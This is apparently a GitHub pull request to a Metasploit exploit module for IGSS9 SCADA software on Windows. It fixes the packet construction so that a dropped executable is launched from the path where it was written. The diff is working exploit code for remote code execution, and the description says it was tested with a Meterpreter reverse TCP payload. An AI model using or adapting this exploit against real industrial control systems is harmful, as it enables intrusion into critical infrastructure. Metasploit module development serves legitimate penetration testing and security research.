### PR TITLE
Fix issue generate/launch path

### DIFF
--- a/modules/exploits/windows/scada/igss9_misc.rb
+++ b/modules/exploits/windows/scada/igss9_misc.rb
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
     pkt << "\x00\x00"
     pkt << "\x0A"
     pkt << "\x00"*31
-    pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#{filename}\""
-    pkt << "\x00"*143
+    pkt << "#{base}#{filename}\""
+    pkt << "\x00"*163 #only for 1 caracter + .exe (i.exe for example)
 
     return pkt
   end


### PR DESCRIPTION
Generate file in C:\ but try to launch it in Documents and Settings\All Users\Application Data\7T\
PoC with windows/meterpreter/reverse_tcp

No issue number. Just discovered it myself.